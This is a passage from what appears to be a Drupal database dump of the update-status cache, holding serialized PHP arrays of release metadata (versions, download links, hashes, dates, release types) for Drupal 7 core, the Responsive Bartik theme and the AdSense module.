7.7\";s:7:\"version\";s:3:\"7.7\";s:3:\"tag\";s:3:\"7.7\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:1:\"7\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:35:\"https://www.drupal.org/node/1231826\";s:13:\"download_link\";s:54:\"http://ftp.drupal.org/files/projects/drupal-7.7.tar.gz\";s:4:\"date\";s:10:\"1311813880\";s:6:\"mdhash\";s:32:\"2eeb63fd1ef6b23b0a9f5f6b8aef8850\";s:8:\"filesize\";s:7:\"2754113\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:9:\"Bug fixes\";}}}s:3:\"7.6\";a:13:{s:4:\"name\";s:10:\"drupal 7.6\";s:7:\"version\";s:3:\"7.6\";s:3:\"tag\";s:3:\"7.6\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:1:\"6\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:35:\"https://www.drupal.org/node/1231586\";s:13:\"download_link\";s:54:\"http://ftp.drupal.org/files/projects/drupal-7.6.tar.gz\";s:4:\"date\";s:10:\"1311798716\";s:6:\"mdhash\";s:32:\"e88e63c4da9e5e170f089d050c88c827\";s:8:\"filesize\";s:7:\"2753784\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:9:\"Bug fixes\";}}}s:3:\"7.5\";a:13:{s:4:\"name\";s:10:\"drupal 7.5\";s:7:\"version\";s:3:\"7.5\";s:3:\"tag\";s:3:\"7.5\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:1:\"5\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:35:\"https://www.drupal.org/node/1231582\";s:13:\"download_link\";s:54:\"http://ftp.drupal.org/files/projects/drupal-7.5.tar.gz\";s:4:\"date\";s:10:\"1311798416\";s:6:\"mdhash\";s:32:\"36d65b7a97c58226c64a6abdf481de45\";s:8:\"filesize\";s:7:\"2744690\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:2:{i:0;s:15:\"Security update\";i:1;s:9:\"Bug fixes\";}}}s:3:\"7.4\";a:13:{s:4:\"name\";s:10:\"drupal 7.4\";s:7:\"version\";s:3:\"7.4\";s:3:\"tag\";s:3:\"7.4\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:1:\"4\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:35:\"https://www.drupal.org/node/1204634\";s:13:\"download_link\";s:54:\"http://ftp.drupal.org/files/projects/drupal-7.4.tar.gz\";s:4:\"date\";s:10:\"1309397516\";s:6:\"mdhash\";s:32:\"84704de078e9f5432c9bb5c6ecd841d4\";s:8:\"filesize\";s:7:\"2744808\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:9:\"Bug fixes\";}}}s:3:\"7.3\";a:13:{s:4:\"name\";s:10:\"drupal 7.3\";s:7:\"version\";s:3:\"7.3\";s:3:\"tag\";s:3:\"7.3\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:1:\"3\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:35:\"https://www.drupal.org/node/1204628\";s:13:\"download_link\";s:54:\"http://ftp.drupal.org/files/projects/drupal-7.3.tar.gz\";s:4:\"date\";s:10:\"1309397216\";s:6:\"mdhash\";s:32:\"c290775724bc309647d84d03ddb88e2e\";s:8:\"filesize\";s:7:\"2735461\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:15:\"Security update\";}}}s:3:\"7.2\";a:13:{s:4:\"name\";s:10:\"drupal 7.2\";s:7:\"version\";s:3:\"7.2\";s:3:\"tag\";s:3:\"7.2\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:1:\"2\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:35:\"https://www.drupal.org/node/1168946\";s:13:\"download_link\";s:54:\"http://ftp.drupal.org/files/projects/drupal-7.2.tar.gz\";s:4:\"date\";s:10:\"1306357017\";s:6:\"mdhash\";s:32:\"cf88c87e3694ebd15b62ba6f6a69124f\";s:8:\"filesize\";s:7:\"2731345\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:9:\"Bug fixes\";}}}s:3:\"7.1\";a:13:{s:4:\"name\";s:10:\"drupal 7.1\";s:7:\"version\";s:3:\"7.1\";s:3:\"tag\";s:3:\"7.1\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:1:\"1\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:35:\"https://www.drupal.org/node/1168910\";s:13:\"download_link\";s:54:\"http://ftp.drupal.org/files/projects/drupal-7.1.tar.gz\";s:4:\"date\";s:10:\"1306354916\";s:6:\"mdhash\";s:32:\"27eb45cb894a76f3a9ae6715584a10cc\";s:8:\"filesize\";s:7:\"2713977\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:15:\"Security update\";}}}s:3:\"7.0\";a:13:{s:4:\"name\";s:10:\"drupal 7.0\";s:7:\"version\";s:3:\"7.0\";s:3:\"tag\";s:3:\"7.0\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:1:\"0\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:35:\"https://www.drupal.org/node/1015392\";s:13:\"download_link\";s:54:\"http://ftp.drupal.org/files/projects/drupal-7.0.tar.gz\";s:4:\"date\";s:10:\"1294208759\";s:6:\"mdhash\";s:32:\"e96c0a5e47c5d7706897384069dfb920\";s:8:\"filesize\";s:7:\"2728271\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:9:\"Bug fixes\";}}}s:7:\"7.0-rc4\";a:14:{s:4:\"name\";s:14:\"drupal 7.0-rc4\";s:7:\"version\";s:7:\"7.0-rc4\";s:3:\"tag\";s:8:\"7.0-rc-4\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:1:\"0\";s:13:\"version_extra\";s:3:\"rc4\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:35:\"https://www.drupal.org/node/1010382\";s:13:\"download_link\";s:58:\"http://ftp.drupal.org/files/projects/drupal-7.0-rc4.tar.gz\";s:4:\"date\";s:10:\"1293684084\";s:6:\"mdhash\";s:32:\"104c08e609c64bb1e45b55a7ad1ad857\";s:8:\"filesize\";s:7:\"2717666\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:9:\"Bug fixes\";}}}s:7:\"7.0-rc3\";a:14:{s:4:\"name\";s:14:\"drupal 7.0-rc3\";s:7:\"version\";s:7:\"7.0-rc3\";s:3:\"tag\";s:8:\"7.0-rc-3\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:1:\"0\";s:13:\"version_extra\";s:3:\"rc3\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:35:\"https://www.drupal.org/node/1005976\";s:13:\"download_link\";s:58:\"http://ftp.drupal.org/files/projects/drupal-7.0-rc3.tar.gz\";s:4:\"date\";s:10:\"1293099424\";s:6:\"mdhash\";s:32:\"be9a3f190e2648fa03dcb2bf3d8be199\";s:8:\"filesize\";s:7:\"2719115\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:2:{i:0;s:15:\"Security update\";i:1;s:9:\"Bug fixes\";}}}s:7:\"7.0-rc2\";a:14:{s:4:\"name\";s:14:\"drupal 7.0-rc2\";s:7:\"version\";s:7:\"7.0-rc2\";s:3:\"tag\";s:8:\"7.0-rc-2\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:1:\"0\";s:13:\"version_extra\";s:3:\"rc2\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:34:\"https://www.drupal.org/node/995778\";s:13:\"download_link\";s:58:\"http://ftp.drupal.org/files/projects/drupal-7.0-rc2.tar.gz\";s:4:\"date\";s:10:\"1292101847\";s:6:\"mdhash\";s:32:\"f31982c73f1707ddccb2927325bc9cb9\";s:8:\"filesize\";s:7:\"2705734\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:2:{i:0;s:15:\"Security update\";i:1;s:9:\"Bug fixes\";}}}s:7:\"7.0-rc1\";a:14:{s:4:\"name\";s:14:\"drupal 7.0-rc1\";s:7:\"version\";s:7:\"7.0-rc1\";s:3:\"tag\";s:8:\"7.0-rc-1\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:1:\"0\";s:13:\"version_extra\";s:3:\"rc1\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:34:\"https://www.drupal.org/node/985946\";s:13:\"download_link\";s:58:\"http://ftp.drupal.org/files/projects/drupal-7.0-rc1.tar.gz\";s:4:\"date\";s:10:\"1291190142\";s:6:\"mdhash\";s:32:\"b554e79cf60c02d4dec592151c4b58ee\";s:8:\"filesize\";s:7:\"2694689\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:3:{i:0;s:15:\"Security update\";i:1;s:12:\"New features\";i:2;s:9:\"Bug fixes\";}}}s:9:\"7.0-beta3\";a:14:{s:4:\"name\";s:16:\"drupal 7.0-beta3\";s:7:\"version\";s:9:\"7.0-beta3\";s:3:\"tag\";s:9:\"7.0-beta3\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:1:\"0\";s:13:\"version_extra\";s:5:\"beta3\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:34:\"https://www.drupal.org/node/971088\";s:13:\"download_link\";s:60:\"http://ftp.drupal.org/files/projects/drupal-7.0-beta3.tar.gz\";s:4:\"date\";s:10:\"1289694735\";s:6:\"mdhash\";s:32:\"c942f010a2535586c4578cd7b107c652\";s:8:\"filesize\";s:7:\"2660883\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:3:{i:0;s:15:\"Security update\";i:1;s:12:\"New features\";i:2;s:9:\"Bug fixes\";}}}s:9:\"7.0-beta2\";a:14:{s:4:\"name\";s:16:\"drupal 7.0-beta2\";s:7:\"version\";s:9:\"7.0-beta2\";s:3:\"tag\";s:9:\"7.0-beta2\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:1:\"0\";s:13:\"version_extra\";s:5:\"beta2\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:34:\"https://www.drupal.org/node/950318\";s:13:\"download_link\";s:60:\"http://ftp.drupal.org/files/projects/drupal-7.0-beta2.tar.gz\";s:4:\"date\";s:10:\"1287812133\";s:6:\"mdhash\";s:32:\"c2de0bdb657b77af8c8369a355cab8ce\";s:8:\"filesize\";s:7:\"2638949\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:2:{i:0;s:12:\"New features\";i:1;s:9:\"Bug fixes\";}}}s:9:\"7.0-beta1\";a:14:{s:4:\"name\";s:16:\"drupal 7.0-beta1\";s:7:\"version\";s:9:\"7.0-beta1\";s:3:\"tag\";s:9:\"7.0-beta1\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:1:\"0\";s:13:\"version_extra\";s:5:\"beta1\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:34:\"https://www.drupal.org/node/934174\";s:13:\"download_link\";s:60:\"http://ftp.drupal.org/files/projects/drupal-7.0-beta1.tar.gz\";s:4:\"date\";s:10:\"1286422866\";s:6:\"mdhash\";s:32:\"490ce0d95eacc15f2918becd60f6821c\";s:8:\"filesize\";s:7:\"2622225\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:2:{i:0;s:15:\"Security update\";i:1;s:9:\"Bug fixes\";}}}s:10:\"7.0-alpha7\";a:14:{s:4:\"name\";s:17:\"drupal 7.0-alpha7\";s:7:\"version\";s:10:\"7.0-alpha7\";s:3:\"tag\";s:10:\"7.0-alpha7\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:1:\"0\";s:13:\"version_extra\";s:6:\"alpha7\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:34:\"https://www.drupal.org/node/913030\";s:13:\"download_link\";s:61:\"http://ftp.drupal.org/files/projects/drupal-7.0-alpha7.tar.gz\";s:4:\"date\";s:10:\"1284599764\";s:6:\"mdhash\";s:32:\"15183fcf862be97f7e96991e6e56fe2e\";s:8:\"filesize\";s:7:\"2586833\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:2:{i:0;s:15:\"Security update\";i:1;s:9:\"Bug fixes\";}}}s:10:\"7.0-alpha6\";a:14:{s:4:\"name\";s:17:\"drupal 7.0-alpha6\";s:7:\"version\";s:10:\"7.0-alpha6\";s:3:\"tag\";s:10:\"7.0-alpha6\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:1:\"0\";s:13:\"version_extra\";s:6:\"alpha6\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:34:\"https://www.drupal.org/node/848970\";s:13:\"download_link\";s:61:\"http://ftp.drupal.org/files/projects/drupal-7.0-alpha6.tar.gz\";s:4:\"date\";s:10:\"1278634809\";s:6:\"mdhash\";s:32:\"eb64647263affc36f76d1e7ffb751d32\";s:8:\"filesize\";s:7:\"2458211\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:3:{i:0;s:15:\"Security update\";i:1;s:12:\"New features\";i:2;s:9:\"Bug fixes\";}}}s:10:\"7.0-alpha5\";a:14:{s:4:\"name\";s:17:\"drupal 7.0-alpha5\";s:7:\"version\";s:10:\"7.0-alpha5\";s:3:\"tag\";s:10:\"7.0-alpha5\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:1:\"0\";s:13:\"version_extra\";s:6:\"alpha5\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:34:\"https://www.drupal.org/node/806978\";s:13:\"download_link\";s:61:\"http://ftp.drupal.org/files/projects/drupal-7.0-alpha5.tar.gz\";s:4:\"date\";s:10:\"1274628613\";s:6:\"mdhash\";s:32:\"de9c1d51f0ce730f7356bd0a160e8ce1\";s:8:\"filesize\";s:7:\"2424226\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:2:{i:0;s:15:\"Security update\";i:1;s:9:\"Bug fixes\";}}}s:10:\"7.0-alpha4\";a:14:{s:4:\"name\";s:17:\"drupal 7.0-alpha4\";s:7:\"version\";s:10:\"7.0-alpha4\";s:3:\"tag\";s:10:\"7.0-alpha4\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:1:\"0\";s:13:\"version_extra\";s:6:\"alpha4\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:34:\"https://www.drupal.org/node/782394\";s:13:\"download_link\";s:61:\"http://ftp.drupal.org/files/projects/drupal-7.0-alpha4.tar.gz\";s:4:\"date\";s:10:\"1272318014\";s:6:\"mdhash\";s:32:\"c8f371a388bc65b2211d7d29856fb993\";s:8:\"filesize\";s:7:\"2403384\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:2:{i:0;s:15:\"Security update\";i:1;s:9:\"Bug fixes\";}}}s:10:\"7.0-alpha3\";a:14:{s:4:\"name\";s:17:\"drupal 7.0-alpha3\";s:7:\"version\";s:10:\"7.0-alpha3\";s:3:\"tag\";s:10:\"7.0-alpha3\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:1:\"0\";s:13:\"version_extra\";s:6:\"alpha3\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:34:\"https://www.drupal.org/node/748690\";s:13:\"download_link\";s:61:\"http://ftp.drupal.org/files/projects/drupal-7.0-alpha3.tar.gz\";s:4:\"date\";s:10:\"1269192317\";s:6:\"mdhash\";s:32:\"9efc083f09d6b523d655bc90a6869945\";s:8:\"filesize\";s:7:\"2357934\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:3:{i:0;s:15:\"Security update\";i:1;s:12:\"New features\";i:2;s:9:\"Bug fixes\";}}}s:10:\"7.0-alpha2\";a:14:{s:4:\"name\";s:17:\"drupal 7.0-alpha2\";s:7:\"version\";s:10:\"7.0-alpha2\";s:3:\"tag\";s:10:\"7.0-alpha2\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:1:\"0\";s:13:\"version_extra\";s:6:\"alpha2\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:34:\"https://www.drupal.org/node/721114\";s:13:\"download_link\";s:61:\"http://ftp.drupal.org/files/projects/drupal-7.0-alpha2.tar.gz\";s:4:\"date\";s:10:\"1266777910\";s:6:\"mdhash\";s:32:\"cfbfdd2249638a266054f2532348065d\";s:8:\"filesize\";s:7:\"2314834\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:9:\"Bug fixes\";}}}s:10:\"7.0-alpha1\";a:14:{s:4:\"name\";s:17:\"drupal 7.0-alpha1\";s:7:\"version\";s:10:\"7.0-alpha1\";s:3:\"tag\";s:10:\"7.0-alpha1\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:1:\"0\";s:13:\"version_extra\";s:6:\"alpha1\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:34:\"https://www.drupal.org/node/685748\";s:13:\"download_link\";s:61:\"http://ftp.drupal.org/files/projects/drupal-7.0-alpha1.tar.gz\";s:4:\"date\";s:10:\"1263566711\";s:6:\"mdhash\";s:32:\"508109c6cf0ead868e02d8c3db2a4d1f\";s:8:\"filesize\";s:7:\"2283220\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:12:\"New features\";}}}s:7:\"7.x-dev\";a:13:{s:4:\"name\";s:14:\"drupal 7.x-dev\";s:7:\"version\";s:7:\"7.x-dev\";s:3:\"tag\";s:3:\"7.x\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_extra\";s:3:\"dev\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:34:\"https://www.drupal.org/node/156281\";s:13:\"download_link\";s:58:\"http://ftp.drupal.org/files/projects/drupal-7.x-dev.tar.gz\";s:4:\"date\";s:10:\"1445632439\";s:6:\"mdhash\";s:32:\"7841b25c0f6b8ad9ca862119eec9ed97\";s:8:\"filesize\";s:7:\"3260249\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:2:{i:0;s:9:\"Bug fixes\";i:1;s:12:\"New features\";}}}}}',1451398474,1451312069,1),('available_releases::responsive_bartik','a:11:{s:5:\"title\";s:20:\"Responsive Bartik D7\";s:10:\"short_name\";s:17:\"responsive_bartik\";s:4:\"type\";s:13:\"project_theme\";s:11:\"api_version\";s:3:\"7.x\";s:17:\"recommended_major\";s:1:\"1\";s:16:\"supported_majors\";s:1:\"1\";s:13:\"default_major\";s:1:\"1\";s:14:\"project_status\";s:9:\"published\";s:4:\"link\";s:48:\"https://www.drupal.org/project/responsive_bartik\";s:5:\"terms\";s:15:\"\n \n \n \n \";s:8:\"releases\";a:5:{s:7:\"7.x-1.0\";a:13:{s:4:\"name\";s:25:\"responsive_bartik 7.x-1.0\";s:7:\"version\";s:7:\"7.x-1.0\";s:3:\"tag\";s:7:\"7.x-1.0\";s:13:\"version_major\";s:1:\"1\";s:13:\"version_patch\";s:1:\"0\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:35:\"https://www.drupal.org/node/2357299\";s:13:\"download_link\";s:69:\"http://ftp.drupal.org/files/projects/responsive_bartik-7.x-1.0.tar.gz\";s:4:\"date\";s:10:\"1413390828\";s:6:\"mdhash\";s:32:\"c75d57de70d0103aaa2860b086241796\";s:8:\"filesize\";s:5:\"62962\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:2:{i:0;s:9:\"Bug fixes\";i:1;s:12:\"New features\";}}}s:11:\"7.x-1.0-rc1\";a:14:{s:4:\"name\";s:29:\"responsive_bartik 7.x-1.0-rc1\";s:7:\"version\";s:11:\"7.x-1.0-rc1\";s:3:\"tag\";s:11:\"7.x-1.0-rc1\";s:13:\"version_major\";s:1:\"1\";s:13:\"version_patch\";s:1:\"0\";s:13:\"version_extra\";s:3:\"rc1\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:35:\"https://www.drupal.org/node/2256523\";s:13:\"download_link\";s:73:\"http://ftp.drupal.org/files/projects/responsive_bartik-7.x-1.0-rc1.tar.gz\";s:4:\"date\";s:10:\"1398976127\";s:6:\"mdhash\";s:32:\"3e5194e46cac63f4b07baa728f5dd730\";s:8:\"filesize\";s:5:\"63473\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:9:\"Bug fixes\";}}}s:13:\"7.x-1.0-beta2\";a:14:{s:4:\"name\";s:31:\"responsive_bartik 7.x-1.0-beta2\";s:7:\"version\";s:13:\"7.x-1.0-beta2\";s:3:\"tag\";s:13:\"7.x-1.0-beta2\";s:13:\"version_major\";s:1:\"1\";s:13:\"version_patch\";s:1:\"0\";s:13:\"version_extra\";s:5:\"beta2\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:35:\"https://www.drupal.org/node/2018161\";s:13:\"download_link\";s:75:\"http://ftp.drupal.org/files/projects/responsive_bartik-7.x-1.0-beta2.tar.gz\";s:4:\"date\";s:10:\"1371066052\";s:6:\"mdhash\";s:32:\"2a1e840557a843f63217c1e7cc984eec\";s:8:\"filesize\";s:5:\"63221\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:2:{i:0;s:12:\"New features\";i:1;s:9:\"Bug fixes\";}}}s:13:\"7.x-1.0-beta1\";a:14:{s:4:\"name\";s:31:\"responsive_bartik 7.x-1.0-beta1\";s:7:\"version\";s:13:\"7.x-1.0-beta1\";s:3:\"tag\";s:13:\"7.x-1.0-beta1\";s:13:\"version_major\";s:1:\"1\";s:13:\"version_patch\";s:1:\"0\";s:13:\"version_extra\";s:5:\"beta1\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:35:\"https://www.drupal.org/node/1863372\";s:13:\"download_link\";s:75:\"http://ftp.drupal.org/files/projects/responsive_bartik-7.x-1.0-beta1.tar.gz\";s:4:\"date\";s:10:\"1355195965\";s:6:\"mdhash\";s:32:\"3be142eec98fc10f29ac7c3f44bd5bcf\";s:8:\"filesize\";s:5:\"61220\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:2:{i:0;s:12:\"New features\";i:1;s:9:\"Bug fixes\";}}}s:11:\"7.x-1.x-dev\";a:13:{s:4:\"name\";s:29:\"responsive_bartik 7.x-1.x-dev\";s:7:\"version\";s:11:\"7.x-1.x-dev\";s:3:\"tag\";s:7:\"7.x-1.x\";s:13:\"version_major\";s:1:\"1\";s:13:\"version_extra\";s:3:\"dev\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:35:\"https://www.drupal.org/node/1733788\";s:13:\"download_link\";s:73:\"http://ftp.drupal.org/files/projects/responsive_bartik-7.x-1.x-dev.tar.gz\";s:4:\"date\";s:10:\"1413390828\";s:6:\"mdhash\";s:32:\"6b92a47e2574dfd222da50f1fa20ec39\";s:8:\"filesize\";s:5:\"62963\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:9:\"Bug fixes\";}}}}}',1451398474,1451312069,1),('fetch_failures','a:0:{}',1451312374,1451312069,1),('update_project_data','a:3:{s:7:\"adsense\";a:17:{s:4:\"name\";s:7:\"adsense\";s:4:\"info\";a:6:{s:4:\"name\";s:12:\"AdSense core\";s:7:\"package\";s:7:\"Adsense\";s:7:\"version\";s:7:\"7.x-1.3\";s:7:\"project\";s:7:\"adsense\";s:9:\"datestamp\";s:10:\"1407429229\";s:16:\"_info_file_ctime\";i:1445543617;}s:9:\"datestamp\";s:10:\"1407429229\";s:8:\"includes\";a:5:{s:7:\"adsense\";s:12:\"AdSense core\";s:13:\"adsense_click\";s:22:\"AdSense Click Tracking\";s:11:\"adsense_cse\";s:10:\"CSE Search\";s:15:\"adsense_managed\";s:11:\"Managed ads\";s:15:\"adsense_oldcode\";s:9:\"Ads (old)\";}s:12:\"project_type\";s:6:\"module\";s:14:\"project_status\";b:1;s:10:\"sub_themes\";a:0:{}s:11:\"base_themes\";a:0:{}s:16:\"existing_version\";s:7:\"7.x-1.3\";s:14:\"existing_major\";s:1:\"1\";s:12:\"install_type\";s:8:\"official\";s:5:\"title\";s:7:\"AdSense\";s:4:\"link\";s:38:\"https://www.drupal.org/project/adsense\";s:14:\"latest_version\";s:7:\"7.x-1.3\";s:8:\"releases\";a:1:{s:7:\"7.x-1.3\";a:13:{s:4:\"name\";s:15:\"adsense 7.x-1.3\";s:7:\"version\";s:7:\"7.x-1.3\";s:3:\"tag\";s:7:\"7.x-1.3\";s:13:\"version_major\";s:1:\"1\";s:13:\"version_patch\";s:1:\"3\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:35:\"https://www.drupal.org/node/2317345\";s:13:\"download_link\";s:59:\"http://ftp.drupal.org/files/projects/adsense-7.x-1.3.tar.gz\";s:4:\"date\";s:10:\"1407429228\";s:6:\"mdhash\";s:32:\"c15e188220e16a5e3e15994cb227f9fa\";s:8:\"filesize\";s:5:\"48652\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:2:{i:0;s:9:\"Bug fixes\";i:1;s:12:\"New features\";}}}}s:11:\"recommended\";s:7:\"7.x-1.3\";s:6:\"status\";i:5;}s:6:\"drupal\";a:17:{s:4:\"name\";s:6:\"drupal\";s:4:\"info\";a:6:{s:4:\"name\";s:5:\"Block\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:16:\"_info_file_ctime\";i:1445543533;}s:9:\"datestamp\";s:10:\"1445457729\";s:8:\"includes\";a:35:{s:5:\"block\";s:5:\"Block\";s:4:\"blog\";s:4:\"Blog\";s:5:\"color\";s:5:\"Color\";s:7:\"comment\";s:7:\"Comment\";s:7:\"contact\";s:7:\"Contact\";s:10:\"contextual\";s:16:\"Contextual links\";s:9:\"dashboard\";s:9:\"Dashboard\";s:5:\"dblog\";s:16:\"Database logging\";s:5:\"field\";s:5:\"Field\";s:17:\"field_sql_storage\";s:17:\"Field SQL storage\";s:8:\"field_ui\";s:8:\"Field UI\";s:4:\"file\";s:4:\"File\";s:6:\"filter\";s:6:\"Filter\";s:4:\"help\";s:4:\"Help\";s:5:\"image\";s:5:\"Image\";s:4:\"list\";s:4:\"List\";s:4:\"menu\";s:4:\"Menu\";s:4:\"node\";s:4:\"Node\";s:6:\"number\";s:6:\"Number\";s:7:\"options\";s:7:\"Options\";s:7:\"overlay\";s:7:\"Overlay\";s:4:\"path\";s:4:\"Path\";s:3:\"php\";s:10:\"PHP filter\";s:3:\"rdf\";s:3:\"RDF\";s:6:\"search\";s:6:\"Search\";s:8:\"shortcut\";s:8:\"Shortcut\";s:10:\"statistics\";s:10:\"Statistics\";s:6:\"system\";s:6:\"System\";s:8:\"taxonomy\";s:8:\"Taxonomy\";s:4:\"text\";s:4:\"Text\";s:7:\"toolbar\";s:7:\"Toolbar\";s:6:\"update\";s:14:\"Update manager\";s:4:\"user\";s:4:\"User\";s:6:\"bartik\";s:6:\"Bartik\";s:5:\"seven\";s:5:\"Seven\";}s:12:\"project_type\";s:4:\"core\";s:14:\"project_status\";b:1;s:10:\"sub_themes\";a:0:{}s:11:\"base_themes\";a:0:{}s:16:\"existing_version\";s:4:\"7.41\";s:14:\"existing_major\";s:1:\"7\";s:12:\"install_type\";s:8:\"official\";s:5:\"title\";s:11:\"Drupal core\";s:4:\"link\";s:37:\"https://www.drupal.org/project/drupal\";s:14:\"latest_version\";s:4:\"7.41\";s:8:\"releases\";a:1:{s:4:\"7.41\";a:13:{s:4:\"name\";s:11:\"drupal 7.41\";s:7:\"version\";s:4:\"7.41\";s:3:\"tag\";s:4:\"7.41\";s:13:\"version_major\";s:1:\"7\";s:13:\"version_patch\";s:2:\"41\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:48:\"https://www.drupal.org/drupal-7.41-release-notes\";s:13:\"download_link\";s:55:\"http://ftp.drupal.org/files/projects/drupal-7.41.tar.gz\";s:4:\"date\";s:10:\"1445457239\";s:6:\"mdhash\";s:32:\"7636e75e8be213455b4ac7911ce5801f\";s:8:\"filesize\";s:7:\"3257325\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:1:{i:0;s:15:\"Security update\";}}}}s:11:\"recommended\";s:4:\"7.41\";s:6:\"status\";i:5;}s:17:\"responsive_bartik\";a:17:{s:4:\"name\";s:17:\"responsive_bartik\";s:4:\"info\";a:5:{s:4:\"name\";s:17:\"Responsive 